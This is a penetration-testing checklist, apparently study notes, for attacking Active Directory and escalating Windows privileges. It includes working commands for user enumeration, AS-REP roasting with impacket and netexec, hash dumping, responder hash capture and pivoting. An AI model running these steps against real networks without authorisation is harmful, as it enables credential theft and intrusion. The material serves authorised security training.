
## Checklist 
## Active Directory

- [ ] Scan all TCP ports
- [ ] Check LDAP, RPC, SMB with anonymous access. Check for public shares
- [ ] Find usernames: use `netexec --rid-brute`, `--users`, and `enumdomuser` with `rpcclient` to get list of domain users without initial credentials. Check usernames with `kerbrute`
- [ ] Test for ASREPRoasting after collecting usernames. If successful, try cracking
- [ ] Check for Kerberoasting after you have a username and password
- [ ] Try authenticating with every possible protocol with credentials: `winrm`, `rdp`, `mssql`, `smb`, `rpc`, `ldap`, etc.
- [ ] Enumerate shares for every user you get access to. Every new user = recheck their shares
- [ ] If you get shell as a user, check for privesc and dump all hashes. Collect them in a file for possible bruteforcing and lateral movement
- [ ] Run BloodHound and check for attack paths, roasting, and DCSync
- [ ] Check for certificate-based attacks with `certipy`
- [ ] Check if writeable share could be a path to steal hashes with `responder`
- [ ] If it's an AD network, check for additional network adapters in case pivoting is needed. If so, set up a pivot and relay all tools over that "jumpbox" to target machines in the other network
- [ ] Remember to bruteforce different protocols with credentials you have. Remember to use NTLM authentication too
- [ ] For post exploitation, dump all hashes (Remote Hashdump & Bruteforce)
- [ ] Check UDP ports
- [ ] Rescan if stuck, verify tools are working properly and you're running them correctly

---

## Windows Privesc

- [ ] Run `whoami /all`, then `PowerUp`, then `WinPEAS`
- [ ] Save output and slowly go over it
- [ ] Check listening ports in case you need to port forward
- [ ] If completely stuck, manually check for creds and try more privesc tools. If that doesn't help, you likely need to relearn the privesc attacks — and consider if privesc is even needed



#### Using netexec

```python
netexec smb <ip range>
```

#### Getting the list of users to a file
```python
netexec ldap <ip-address> -u <username> -p <password> --users | fgrep -v '[' | fgrep -vi '-Username-' | awk '{print$ 5}' | tee users
```
#### ASREP Roasting

```python
impacket-GetNPUsers <domain>/ -dc-ip <domain-controller-ip> -usersfile users -outputfile hashes.txt
```
#### ASREP Roasting using netexec
```python
netexec ldap <dc-ip> -u users -p '' -k --dns-server 10.0.2.4 
# This is gonna check for Kerberoastable accounts and also if any account is asprep roastable
netexec ldap <dc-ip> -u users -p '' -k --dns-server 10.0.2.4 --asrep hash
# This command will print the hash for the user that you found earlier to be asrep roastable. 

```
